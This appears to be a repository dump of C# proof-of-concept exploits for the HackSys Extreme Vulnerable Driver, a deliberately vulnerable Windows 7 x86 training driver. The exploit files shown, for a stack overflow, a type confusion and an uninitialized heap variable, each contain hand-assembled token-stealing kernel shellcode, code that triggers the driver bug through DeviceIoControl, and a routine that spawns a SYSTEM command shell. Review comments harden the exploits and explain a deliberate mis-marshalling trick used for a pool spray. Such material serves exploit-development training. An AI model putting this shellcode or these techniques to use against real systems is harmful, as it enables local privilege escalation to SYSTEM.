79 | static extern bool DeviceIoControl(
80 | IntPtr hDevice,
81 | uint dwIoControlCode,
82 | IntPtr InBuffer,
83 | int nInBufferSize,
84 | IntPtr OutBuffer,
85 | int nOutBufferSize,
86 | ref int pBytesReturned,
87 | IntPtr lpOverlapped);
88 |
89 | [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)]
90 | static extern bool CreateProcess(
91 | string lpApplicationName,
92 | string lpCommandLine,
93 | ref SECURITY_ATTRIBUTES lpProcessAttributes,
94 | ref SECURITY_ATTRIBUTES lpThreadAttributes,
95 | bool bInheritHandles,
96 | uint dwCreationFlags,
97 | IntPtr lpEnvironment,
98 | string lpCurrentDirectory,
99 | ref STARTUPINFO lpStartupInfo,
100 | out PROCESS_INFORMATION lpProcessInformation);
101 |
102 | [DllImport("kernel32.dll", SetLastError = true)]
103 | static extern bool CloseHandle(IntPtr hObject);
104 |
105 | [DllImport("kernel32.dll", SetLastError = true)]
106 | static extern uint WaitForSingleObject(IntPtr hHandle, int dwMilliseconds);
107 |
108 | // Global variables
109 | static IntPtr hDevice = IntPtr.Zero;
110 |
111 | // Helper functions
112 | static void CleanUp()
113 | {
114 | Console.WriteLine("[>] Cleaning up handle object(s)");
115 | if (hDevice != IntPtr.Zero)
116 | {
117 | if (CloseHandle(hDevice))
118 | {
119 | hDevice = IntPtr.Zero;
120 | }
121 | else
122 | {
123 | Console.WriteLine("[!] Failed to close a kernel driver's handle (code={0})", Marshal.GetLastWin32Error());
124 | }
125 | }
126 | }
127 |
128 | static bool IsWin7x86()
129 | {
130 | string arch = Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
131 | int MajorVersion = 0;
132 | int MinorVersion = 0;
133 | int BuildNumber = 0;
134 | RtlGetNtVersionNumbers(ref MajorVersion, ref MinorVersion, ref BuildNumber);
135 | BuildNumber &= 0xFFFF;
136 |
137 | if (MajorVersion == 6 && MinorVersion == 1 && BuildNumber == 7601 &&
138 | string.Compare(arch, "x86", StringComparison.OrdinalIgnoreCase) == 0)
139 | {
140 | Console.WriteLine("[+] Windows 7 SP1 x86 is detected");
141 | return true;
142 | }
143 | else
144 | {
145 | Console.WriteLine("[-] Unsupported OS is detected");
146 | return false;
147 | }
148 | }
149 |
150 | static bool IsSystem()
151 | {
152 | string user = Environment.UserName;
153 |
154 | if (string.Compare(user, "SYSTEM", StringComparison.OrdinalIgnoreCase) == 0)
155 | {
156 | return true;
157 | }
158 | else
159 | {
160 | return false;
161 | }
162 | }
163 |
164 | static bool SpawnShell()
165 | {
166 | string ApplicationName = "C:\\Windows\\System32\\cmd.exe";
167 | SECURITY_ATTRIBUTES pSec = new SECURITY_ATTRIBUTES();
168 | SECURITY_ATTRIBUTES tSec = new SECURITY_ATTRIBUTES();
169 | uint CREATE_NEW_CONSOLE = 0x00000010;
170 | string CurrentDirectory = "C:\\Windows\\System32";
171 | STARTUPINFO si = new STARTUPINFO();
172 | pSec.nLength = Marshal.SizeOf(pSec);
173 | tSec.nLength = Marshal.SizeOf(tSec);
174 |
175 | bool status = CreateProcess(
176 | ApplicationName, null, ref pSec, ref tSec, false,
177 | CREATE_NEW_CONSOLE, IntPtr.Zero, CurrentDirectory,
178 | ref si, out PROCESS_INFORMATION pi);
179 |
180 | if (status)
181 | {
182 | Console.WriteLine("[+] Shell is spawned successfully (PID = {0})", pi.dwProcessId);
183 | WaitForSingleObject(pi.hProcess, 500);
184 | CloseHandle(pi.hProcess);
185 | CloseHandle(pi.hThread);
186 | }
187 | else
188 | {
189 | Console.WriteLine("[!] Failed to spawn shell (code={0})", Marshal.GetLastWin32Error());
190 | }
191 |
192 | return status;
193 | }
194 |
195 | // Main function
196 | static void Main()
197 | {
198 | byte[] shellcode = {
199 | //--[Setup]
200 | 0x60, // pushad
201 | 0x64, 0xA1, 0x24, 0x01, 0x00, 0x00, // mov eax, fs:[KTHREAD_OFFSET]
202 | 0x8B, 0x40, 0x50, // mov eax, [eax + EPROCESS_OFFSET]
203 | 0x89, 0xC1, // mov ecx, eax (Current _EPROCESS structure)
204 | 0x8B, 0x98, 0xF8, 0x00, 0x00, 0x00, // mov ebx, [eax + TOKEN_OFFSET]
205 | //--[Copy System PID token]
206 | 0xBA, 0x04, 0x00, 0x00, 0x00, // mov edx, 4 (SYSTEM PID)
207 | 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, // mov eax, [eax + FLINK_OFFSET] <-|
208 | 0x2D, 0xB8, 0x00, 0x00, 0x00, // sub eax, FLINK_OFFSET |
209 | 0x39, 0x90, 0xB4, 0x00, 0x00, 0x00, // cmp [eax + PID_OFFSET], edx |
210 | 0x75, 0xED, // jnz ->|
211 | 0x8B, 0x90, 0xF8, 0x00, 0x00, 0x00, // mov edx, [eax + TOKEN_OFFSET]
212 | 0x89, 0x91, 0xF8, 0x00, 0x00, 0x00, // mov [ecx + TOKEN_OFFSET], edx
213 | //--[Recover]
214 | 0x61, // popad
215 | 0x81, 0xC4, 0x8C, 0x07, 0x00, 0x00, // add esp,0x78c ; Offset of IRP on stack
216 | 0x8B, 0x3C, 0x24, // mov edi,DWORD PTR [esp] ; Restore the pointer to IRP
217 | 0x83, 0xC4, 0x08, // add esp,0x8 ; Offset of DbgPrint string
218 | 0x8B, 0x1C, 0x24, // mov ebx,DWORD PTR [esp] ; Restore the DbgPrint string
219 | 0x81, 0xC4, 0x34, 0x02, 0x00, 0x00, // add esp,0x234 ; Target frame to return
220 | 0x31, 0xC0, // xor eax, eax ; NTSTATUS -> STATUS_SUCCESS
221 | 0x5D, // pop ebp ; Restore saved EBP
222 | 0xC2, 0x08, 0x00 // ret 8 ; Return cleanly
223 | };
224 |
225 | Console.WriteLine("--[ HEVD Exploitation : Stack Overflow GS\n");
226 |
227 | if (!IsWin7x86())
228 | {
229 | return;
230 | }
231 |
232 | // Step 1: Allocate memory for shellcode
233 | IntPtr ShellcodeBuffer;
234 | uint dwSize = 0x2000;
235 | uint MEM_COMMIT = 0x00001000;
236 | uint MEM_RESERVE = 0x00002000;
237 | uint PAGE_EXECUTE_READWRITE = 0x40;
238 |
239 | Console.WriteLine("[>] Trying to allocate shellcode.");
240 | ShellcodeBuffer = VirtualAlloc(IntPtr.Zero, dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
241 |
242 | if (ShellcodeBuffer == IntPtr.Zero)
243 | {
244 | Console.WriteLine("[-] Failed to VirtualAlloc (code={0})", Marshal.GetLastWin32Error());
245 | return;
246 | }
247 |
248 | Console.WriteLine("[+] Allocated {0} bytes buffer at 0x{1}.", dwSize, ShellcodeBuffer.ToString("X8"));
249 |
250 | // Step 2: Free memory to trigger memory access exception with memcpy
251 | IntPtr FreeBuffer = new IntPtr(ShellcodeBuffer.ToInt32() + 0x1000);
252 | dwSize = 0x1000;
253 | uint MEM_DECOMMIT = 0x00004000;
254 |
255 | Console.WriteLine("[>] Trying to free memory page from 0x{0}.", FreeBuffer.ToString("X8"));
256 | bool status = VirtualFree(FreeBuffer, dwSize, MEM_DECOMMIT);
257 |
258 | if (!status)
259 | {
260 | Console.WriteLine("[-] Failed to VirtualFree (code={0})", Marshal.GetLastWin32Error());
261 | return;
262 | }
263 |
264 | Console.WriteLine("[+] VirtualFree is successful.");
265 |
266 | // Step 3: Set shellcode and payload
267 | Marshal.Copy(shellcode, 0, ShellcodeBuffer, shellcode.Length);
268 |
269 | byte[] padding = Encoding.ASCII.GetBytes(new String('A', 0x210));
270 | byte[] callback = BitConverter.GetBytes(ShellcodeBuffer.ToInt32());
271 | byte[] payload = new byte[padding.Length + callback.Length];
272 | padding.CopyTo(payload, 0);
273 | callback.CopyTo(payload, padding.Length);
274 |
275 | IntPtr PayloadPointer = new IntPtr(FreeBuffer.ToInt32() - payload.Length);
276 | Marshal.Copy(payload, 0, PayloadPointer, payload.Length);
277 |
278 | // Step 4: Open driver's handle
279 | string deviceName = "\\\\.\\HacksysExtremeVulnerableDriver";
280 | uint GENERIC_READ = 0x80000000;
281 | uint GENERIC_WRITE = 0x40000000;
282 | uint FILE_SHARE_READ = 0x00000001;
283 | uint FILE_SHARE_WRITE = 0x00000002;
284 | uint OPEN_EXISTING = 0x3;
285 | uint FILE_ATTRIBUTE_NORMAL = 0x80;
286 | uint FILE_FLAG_OVERWRAPPED = 0x40000000;
287 | IntPtr invalid = new IntPtr(-1);
288 |
289 | Console.WriteLine("[>] Opening {0}", deviceName);
290 | hDevice = CreateFile(
291 | deviceName, GENERIC_READ | GENERIC_WRITE,
292 | FILE_SHARE_READ | FILE_SHARE_WRITE, IntPtr.Zero,
293 | OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERWRAPPED, IntPtr.Zero);
294 |
295 | if (hDevice == invalid)
296 | {
297 | Console.WriteLine("[-] Failed to open {0} (code={1})", deviceName, Marshal.GetLastWin32Error());
298 | return;
299 | }
300 |
301 | Console.WriteLine("[+] HEVD.sys is opened succesfuly (hDevice = 0x{0})", hDevice.ToString("X"));
302 |
303 | // Step 5: Trigger stack overflow and memory access exception
304 | uint ioctl = 0x222007;
305 | int BytesReturned = 0;
306 |
307 | Console.WriteLine("[>] Triggering stack overflow and memory access exception.");
308 | status = DeviceIoControl(hDevice, ioctl, PayloadPointer, payload.Length + 0x4, IntPtr.Zero, 0, ref BytesReturned, IntPtr.Zero);
309 |
310 | if (!status)
311 | {
312 | Console.WriteLine("[-] Failed to send payload (code={0})", Marshal.GetLastWin32Error());
313 | CleanUp();
314 | return;
315 | }
316 | CleanUp();
317 |
318 | // Step 6: Spawn SYSTEM shell
319 | if (IsSystem() && SpawnShell())
320 | {
321 | Console.WriteLine("[+] Exploit is completed successfully");
322 | }
323 | else
324 | {
325 | Console.WriteLine("[-] Failed to exploit.");
326 | }
327 | }
328 | }
329 | }
--------------------------------------------------------------------------------
/HEVD_Win7x86/StackOverflowGS/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
// Assembly-level metadata for the StackOverflowGS proof of concept.  These are the Visual
// Studio template defaults; only the title/product were filled in.
[assembly: AssemblyTitle("StackOverflowGS")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("StackOverflowGS")]
[assembly: AssemblyCopyright("Copyright © 2021")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]

// The assembly exposes nothing to COM; set ComVisible(true) on an individual type if one
// ever needs to be reachable from COM.
[assembly: ComVisible(false)]

// Typelib ID used only if the project is ever exposed to COM; matches the ProjectGuid in the .csproj.
[assembly: Guid("47ed8c95-0e1b-43de-9ec4-12505c263168")]

// Version is Major.Minor.Build.Revision.  A '*' for Build/Revision lets the compiler
// generate them, e.g. [assembly: AssemblyVersion("1.0.*")]; fixed values are used here.
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/StackOverflowGS/StackOverflowGS.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {47ED8C95-0E1B-43DE-9EC4-12505C263168}
8 | Exe
9 | StackOverflowGS
10 | StackOverflowGS
11 | v2.0
12 | 512
13 | true
14 |
15 |
16 |
17 | true
18 | ..\bin\x86\Debug\
19 | DEBUG;TRACE
20 | full
21 | x86
22 | prompt
23 | MinimumRecommendedRules.ruleset
24 |
25 |
26 | ..\bin\x86\Release\
27 | TRACE
28 | true
29 | pdbonly
30 | x86
31 | prompt
32 | MinimumRecommendedRules.ruleset
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/TypeConfusion/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/TypeConfusion/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
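namespace TypeConfusion
{
    // HEVD "TypeConfusion" proof of concept for Windows 7 SP1 x86.  An 8-byte user object
    // (opaque first field, then the shellcode address) is handed to the driver, which ends up
    // calling the second field as a function pointer; the token-stealing payload runs and
    // returns, and a SYSTEM shell is spawned.
    //
    // Review fixes relative to the original:
    //  - IsWin7x86() rejects WOW64 (PROCESSOR_ARCHITEW6432 set): PROCESSOR_ARCHITECTURE alone
    //    is "x86" for a 32-bit process on a 64-bit kernel, where these offsets would crash the box.
    //  - SpawnShell() sets STARTUPINFO.cb, which the CreateProcess contract requires.
    //  - The device is opened without FILE_FLAG_OVERLAPPED since DeviceIoControl is always
    //    called with a null OVERLAPPED (the constant was also misspelled "OVERWRAPPED").
    //  - hDevice is reset to IntPtr.Zero when CreateFile fails so CleanUp()'s sentinel stays valid.
    class Program
    {
        // Win32 SECURITY_ATTRIBUTES; only nLength is filled in, no descriptor is supplied.
        [StructLayout(LayoutKind.Sequential)]
        struct SECURITY_ATTRIBUTES
        {
            public int nLength;
            public IntPtr lpSecurityDescriptor;
            public int bInheritHandle;
        }

        // Win32 STARTUPINFOW; cb must hold the structure size before CreateProcess is called.
        [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
        struct STARTUPINFO
        {
            public int cb;
            public string lpReserved;
            public string lpDesktop;
            public string lpTitle;
            public int dwX;
            public int dwY;
            public int dwXSize;
            public int dwYSize;
            public int dwXCountChars;
            public int dwYCountChars;
            public int dwFillAttribute;
            public int dwFlags;
            public short wShowWindow;
            public short cbReserved2;
            public IntPtr lpReserved2;
            public IntPtr hStdInput;
            public IntPtr hStdOutput;
            public IntPtr hStdError;
        }

        // Win32 PROCESS_INFORMATION returned by CreateProcess; both handles must be closed.
        [StructLayout(LayoutKind.Sequential)]
        struct PROCESS_INFORMATION
        {
            public IntPtr hProcess;
            public IntPtr hThread;
            public int dwProcessId;
            public int dwThreadId;
        }

        // Kernel version as reported by ntdll; the caller keeps only the low 16 bits of BuildNumber.
        [DllImport("ntdll.dll")]
        static extern void RtlGetNtVersionNumbers(
            ref int MajorVersion,
            ref int MinorVersion,
            ref int BuildNumber);

        // Commits the RWX page that holds the shellcode.
        [DllImport("kernel32.dll", SetLastError = true)]
        static extern IntPtr VirtualAlloc(
            IntPtr lpAddress,
            uint dwSize,
            uint flAllocationType,
            uint flProtect);

        // Opens the HEVD device; returns INVALID_HANDLE_VALUE (-1), not IntPtr.Zero, on failure.
        [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
        static extern IntPtr CreateFile(
            string lpFileName,
            uint dwDesiredAccess,
            uint dwShareMode,
            IntPtr lpSecurityAttributes,
            uint dwCreationDisposition,
            uint dwFlagsAndAttributes,
            IntPtr hTemplateFile);

        // InBuffer is a managed byte[]; the marshaller pins it for the duration of the call.
        [DllImport("kernel32.dll", SetLastError = true)]
        static extern bool DeviceIoControl(
            IntPtr hDevice,
            uint dwIoControlCode,
            byte[] InBuffer,
            int nInBufferSize,
            IntPtr OutBuffer,
            int nOutBufferSize,
            ref int pBytesReturned,
            IntPtr lpOverlapped);

        [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)]
        static extern bool CreateProcess(
            string lpApplicationName,
            string lpCommandLine,
            ref SECURITY_ATTRIBUTES lpProcessAttributes,
            ref SECURITY_ATTRIBUTES lpThreadAttributes,
            bool bInheritHandles,
            uint dwCreationFlags,
            IntPtr lpEnvironment,
            string lpCurrentDirectory,
            ref STARTUPINFO lpStartupInfo,
            out PROCESS_INFORMATION lpProcessInformation);

        [DllImport("kernel32.dll", SetLastError = true)]
        static extern bool CloseHandle(IntPtr hObject);

        [DllImport("kernel32.dll", SetLastError = true)]
        static extern uint WaitForSingleObject(IntPtr hHandle, int dwMilliseconds);

        // Global variables
        // HEVD device handle; IntPtr.Zero means "nothing to close" (see CleanUp).
        static IntPtr hDevice = IntPtr.Zero;

        // Helper functions

        // Closes the device handle if one is open and resets the global to IntPtr.Zero.
        // On CloseHandle failure the handle value is kept so the failure stays visible.
        static void CleanUp()
        {
            Console.WriteLine("[>] Cleaning up handle object(s)");
            if (hDevice == IntPtr.Zero)
            {
                return;
            }

            if (!CloseHandle(hDevice))
            {
                Console.WriteLine("[!] Failed to close a kernel driver's handle (code={0})", Marshal.GetLastWin32Error());
                return;
            }

            hDevice = IntPtr.Zero;
        }

        // Gate for the hard-coded Win7 SP1 x86 kernel offsets: true only on build 7601 with a
        // native 32-bit kernel.
        //
        // PROCESSOR_ARCHITECTURE describes the *process*: a 32-bit build of this tool on 64-bit
        // Windows 7 still sees "x86" under WOW64, and the shellcode's x86 offsets would then be
        // run against an x64 kernel.  Windows sets PROCESSOR_ARCHITEW6432 only inside a WOW64
        // process, so a non-empty value is treated as "not x86".  Environment.Is64BitOperatingSystem
        // is avoided because it is a .NET 4.0 API and this project targets v2.0.
        static bool IsWin7x86()
        {
            string arch = Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
            string wow64Arch = Environment.GetEnvironmentVariable("PROCESSOR_ARCHITEW6432");
            int MajorVersion = 0;
            int MinorVersion = 0;
            int BuildNumber = 0;
            RtlGetNtVersionNumbers(ref MajorVersion, ref MinorVersion, ref BuildNumber);
            BuildNumber &= 0xFFFF; // only the low 16 bits are the build number

            bool isWin7Sp1 = MajorVersion == 6 && MinorVersion == 1 && BuildNumber == 7601;
            bool isNativeX86 = string.Compare(arch, "x86", StringComparison.OrdinalIgnoreCase) == 0
                               && string.IsNullOrEmpty(wow64Arch);

            if (isWin7Sp1 && isNativeX86)
            {
                Console.WriteLine("[+] Windows 7 SP1 x86 is detected");
                return true;
            }

            Console.WriteLine("[-] Unsupported OS is detected");
            return false;
        }

        // Used after the IOCTL returns to check whether the process now runs as SYSTEM
        // (case-insensitive comparison of the current user name).
        static bool IsSystem()
        {
            string user = Environment.UserName;
            return string.Compare(user, "SYSTEM", StringComparison.OrdinalIgnoreCase) == 0;
        }

        // Launches cmd.exe in a new console with this process's (by now SYSTEM) token.
        // Returns true if CreateProcess succeeded.  The child is waited on briefly and both
        // returned handles are closed; closing them does not terminate the shell.
        static bool SpawnShell()
        {
            string ApplicationName = "C:\\Windows\\System32\\cmd.exe";
            string CurrentDirectory = "C:\\Windows\\System32";
            uint CREATE_NEW_CONSOLE = 0x00000010;

            SECURITY_ATTRIBUTES pSec = new SECURITY_ATTRIBUTES();
            SECURITY_ATTRIBUTES tSec = new SECURITY_ATTRIBUTES();
            pSec.nLength = Marshal.SizeOf(pSec);
            tSec.nLength = Marshal.SizeOf(tSec);

            STARTUPINFO si = new STARTUPINFO();
            si.cb = Marshal.SizeOf(si); // required by CreateProcess; the original left it at 0

            PROCESS_INFORMATION pi;
            bool status = CreateProcess(
                ApplicationName, null, ref pSec, ref tSec, false,
                CREATE_NEW_CONSOLE, IntPtr.Zero, CurrentDirectory,
                ref si, out pi);

            if (!status)
            {
                Console.WriteLine("[!] Failed to spawn shell (code={0})", Marshal.GetLastWin32Error());
                return false;
            }

            Console.WriteLine("[+] Shell is spawned successfully (PID = {0})", pi.dwProcessId);
            WaitForSingleObject(pi.hProcess, 500);
            CloseHandle(pi.hProcess);
            CloseHandle(pi.hThread);
            return true;
        }

        // Main function
        static void Main()
        {
            // Token-stealing shellcode for Windows 7 SP1 x86, called by the driver as a plain
            // function and returning with a bare ret.  Offsets are the usual Win7 x86 values
            // (KTHREAD at fs:0x124, EPROCESS at KTHREAD+0x50, ActiveProcessLinks at +0xB8,
            // UniqueProcessId at +0xB4, Token at +0xF8).
            byte[] shellcode = {
                //--[Setup]
                0x60,                                       // pushad
                0x64, 0xA1, 0x24, 0x01, 0x00, 0x00,         // mov eax, fs:[KTHREAD_OFFSET]
                0x8B, 0x40, 0x50,                           // mov eax, [eax + EPROCESS_OFFSET]
                0x89, 0xC1,                                 // mov ecx, eax (current _EPROCESS, kept for the token write)
                0x8B, 0x98, 0xF8, 0x00, 0x00, 0x00,         // mov ebx, [eax + TOKEN_OFFSET] (current token; not used afterwards)
                //--[Copy System PID token]
                0xBA, 0x04, 0x00, 0x00, 0x00,               // mov edx, 4 (SYSTEM PID)
                0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00,         // mov eax, [eax + FLINK_OFFSET]      <-|
                0x2D, 0xB8, 0x00, 0x00, 0x00,               // sub eax, FLINK_OFFSET                |
                0x39, 0x90, 0xB4, 0x00, 0x00, 0x00,         // cmp [eax + PID_OFFSET], edx          |
                0x75, 0xED,                                 // jnz                                ->|
                0x8B, 0x90, 0xF8, 0x00, 0x00, 0x00,         // mov edx, [eax + TOKEN_OFFSET]  (SYSTEM token)
                0x89, 0x91, 0xF8, 0x00, 0x00, 0x00,         // mov [ecx + TOKEN_OFFSET], edx  (overwrite ours)
                //--[Recover]
                0x61,                                       // popad
                0xC3                                        // ret
            };

            Console.WriteLine("--[ HEVD Exploitation : Type Confusion\n");

            if (!IsWin7x86())
            {
                return;
            }

            // Step 1: one RWX page for the shellcode.
            uint MEM_COMMIT = 0x00001000;
            uint MEM_RESERVE = 0x00002000;
            uint PAGE_EXECUTE_READWRITE = 0x40;
            uint regionSize = 0x1000;

            Console.WriteLine("[>] Trying to allocate shellcode");
            IntPtr ShellcodeBuffer = VirtualAlloc(IntPtr.Zero, regionSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

            if (ShellcodeBuffer == IntPtr.Zero)
            {
                Console.WriteLine("[-] Failed to VirtualAlloc (code={0})", Marshal.GetLastWin32Error());
                return;
            }

            Console.WriteLine("[+] Allocated {0} bytes buffer at 0x{1}", regionSize, ShellcodeBuffer.ToString("X8"));
            Marshal.Copy(shellcode, 0, ShellcodeBuffer, shellcode.Length);
            Console.WriteLine("[+] Shellcode is allocated at 0x{0}", ShellcodeBuffer.ToString("X8"));

            // Step 2: the 8-byte user object.  The first dword is filler the exploit does not care
            // about; the second is the field the driver ends up calling, so it holds the shellcode
            // address.
            byte[] padding = BitConverter.GetBytes((uint)0xdeadbeef);
            byte[] callback = BitConverter.GetBytes(ShellcodeBuffer.ToInt32());
            byte[] payload = new byte[padding.Length + callback.Length];
            padding.CopyTo(payload, 0);
            callback.CopyTo(payload, padding.Length);

            // Step 3: open the device.  The handle is only used synchronously (DeviceIoControl is
            // called with a null OVERLAPPED), so FILE_FLAG_OVERLAPPED is deliberately not
            // requested - an overlapped handle with lpOverlapped == NULL is outside the API contract.
            string deviceName = "\\\\.\\HacksysExtremeVulnerableDriver";
            uint GENERIC_READ = 0x80000000;
            uint GENERIC_WRITE = 0x40000000;
            uint FILE_SHARE_READ = 0x00000001;
            uint FILE_SHARE_WRITE = 0x00000002;
            uint OPEN_EXISTING = 0x3;
            uint FILE_ATTRIBUTE_NORMAL = 0x80;
            IntPtr INVALID_HANDLE_VALUE = new IntPtr(-1);

            Console.WriteLine("[>] Opening {0}", deviceName);
            hDevice = CreateFile(
                deviceName, GENERIC_READ | GENERIC_WRITE,
                FILE_SHARE_READ | FILE_SHARE_WRITE, IntPtr.Zero,
                OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, IntPtr.Zero);

            if (hDevice == INVALID_HANDLE_VALUE)
            {
                Console.WriteLine("[-] Failed to open {0} (code={1})", deviceName, Marshal.GetLastWin32Error());
                hDevice = IntPtr.Zero; // keep CleanUp()'s "nothing to close" sentinel valid
                return;
            }

            Console.WriteLine("[+] HEVD.sys is opened succesfuly (hDevice = 0x{0})", hDevice.ToString("X"));

            // Step 4: IOCTL 0x222023.  The low two bits select METHOD_NEITHER, so the driver works
            // on the user buffer in place.
            uint ioctl = 0x222023;
            int BytesReturned = 0;

            Console.WriteLine("[>] Triggering type confusion");
            bool status = DeviceIoControl(hDevice, ioctl, payload, payload.Length, IntPtr.Zero, 0, ref BytesReturned, IntPtr.Zero);

            if (!status)
            {
                Console.WriteLine("[-] Failed to send payload (code={0})", Marshal.GetLastWin32Error());
                CleanUp();
                return;
            }
            CleanUp();

            // Step 5: if the token swap took, this process is SYSTEM now and the shell inherits it.
            if (IsSystem() && SpawnShell())
            {
                Console.WriteLine("[+] Exploit is completed successfully");
            }
            else
            {
                Console.WriteLine("[-] Failed to exploit");
            }
        }
    }
}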
--------------------------------------------------------------------------------
/HEVD_Win7x86/TypeConfusion/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
// Assembly-level metadata for the TypeConfusion proof of concept.  These are the Visual
// Studio template defaults; only the title/product were filled in.
[assembly: AssemblyTitle("TypeConfusion")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("TypeConfusion")]
[assembly: AssemblyCopyright("Copyright © 2021")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]

// The assembly exposes nothing to COM; set ComVisible(true) on an individual type if one
// ever needs to be reachable from COM.
[assembly: ComVisible(false)]

// Typelib ID used only if the project is ever exposed to COM; matches the ProjectGuid in the .csproj.
[assembly: Guid("ec2f5921-aca8-4f8f-af6a-f238e0aa61dd")]

// Version is Major.Minor.Build.Revision.  A '*' for Build/Revision lets the compiler
// generate them, e.g. [assembly: AssemblyVersion("1.0.*")]; fixed values are used here.
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/TypeConfusion/TypeConfusion.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {EC2F5921-ACA8-4F8F-AF6A-F238E0AA61DD}
8 | Exe
9 | TypeConfusion
10 | TypeConfusion
11 | v2.0
12 | 512
13 | true
14 |
15 |
16 |
17 | x86
18 | ..\bin\x86\Debug\
19 |
20 |
21 | x86
22 | ..\bin\x86\Release\
23 | TRACE
24 | true
25 | pdbonly
26 | true
27 |
28 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/UninitializedHeapVariable/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 | using System.Text;
4 |
5 | namespace UninitializedHeapVariable
6 | {
7 | class Program
8 | {
// Win32 SECURITY_ATTRIBUTES, passed by ref to CreateProcess by SpawnShell().
// Only nLength is filled in; the descriptor stays null and the handle is non-inheritable.
[StructLayout(LayoutKind.Sequential)]
struct SECURITY_ATTRIBUTES
{
    public int nLength;                 // sizeof(SECURITY_ATTRIBUTES)
    public IntPtr lpSecurityDescriptor; // left IntPtr.Zero
    public int bInheritHandle;          // BOOL, left 0
}
16 |
// Win32 STARTUPINFOW (CharSet.Unicode marshals the string fields as LPWSTR).
// CreateProcess requires cb to hold the structure size; everything else may stay zero.
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
struct STARTUPINFO
{
    public int cb;               // must be Marshal.SizeOf(STARTUPINFO)
    public string lpReserved;
    public string lpDesktop;
    public string lpTitle;
    public int dwX;
    public int dwY;
    public int dwXSize;
    public int dwYSize;
    public int dwXCountChars;
    public int dwYCountChars;
    public int dwFillAttribute;
    public int dwFlags;          // STARTF_* flags selecting which fields below are honoured
    public short wShowWindow;
    public short cbReserved2;
    public IntPtr lpReserved2;
    public IntPtr hStdInput;
    public IntPtr hStdOutput;
    public IntPtr hStdError;
}
39 |
// Win32 PROCESS_INFORMATION filled in by CreateProcess.  Both handles are owned by the
// caller and are closed by SpawnShell() after a short wait.
[StructLayout(LayoutKind.Sequential)]
struct PROCESS_INFORMATION
{
    public IntPtr hProcess;
    public IntPtr hThread;
    public int dwProcessId;
    public int dwThreadId;
}
48 |
// Kernel version straight from ntdll (not subject to manifest-based version lying).
// IsWin7x86() keeps only the low 16 bits of BuildNumber.
[DllImport("ntdll.dll")]
static extern void RtlGetNtVersionNumbers(
    ref int MajorVersion,
    ref int MinorVersion,
    ref int BuildNumber);
54 |
// Main() asks for the shellcode page at a fixed address (0x40400140); VirtualAlloc rounds
// lpAddress down to the allocation granularity, so the caller re-derives the offset inside
// the returned region.  Returns IntPtr.Zero on failure.
[DllImport("kernel32.dll", SetLastError = true)]
static extern IntPtr VirtualAlloc(
    IntPtr lpAddress,
    uint dwSize,
    uint flAllocationType,
    uint flProtect);
61 |
// NOTE(review): deliberately mis-marshalled - do not "fix" to LPWStr.
// CreateEventW expects a UTF-16 name, but lpName is handed over as an ANSI (LPStr) buffer,
// so every byte of the managed string lands in the kernel object's name buffer verbatim.
// Main() relies on this to embed the raw bytes \x40\x01\x40\x40 (little-endian 0x40400140,
// the address the shellcode is mapped at) inside each sprayed event name.  With LPWStr the
// bytes would be widened to 40 00 01 00 40 00 40 00 and the spray would stop working.
[DllImport("kernel32.dll", SetLastError = true)]
static extern IntPtr CreateEventW(
    IntPtr lpEventAttributes,
    bool bManualReset,
    bool bInitialState,
    [MarshalAs(UnmanagedType.LPStr)]
    string lpName);
69 |
// Opens the HEVD device.  Note the failure value is INVALID_HANDLE_VALUE (-1), not
// IntPtr.Zero; Main() compares against new IntPtr(-1).
[DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
static extern IntPtr CreateFile(
    string lpFileName,
    uint dwDesiredAccess,
    uint dwShareMode,
    IntPtr lpSecurityAttributes,
    uint dwCreationDisposition,
    uint dwFlagsAndAttributes,
    IntPtr hTemplateFile);
79 |
// Sends the trigger IOCTL.  InBuffer is a managed byte[] that the marshaller pins for the
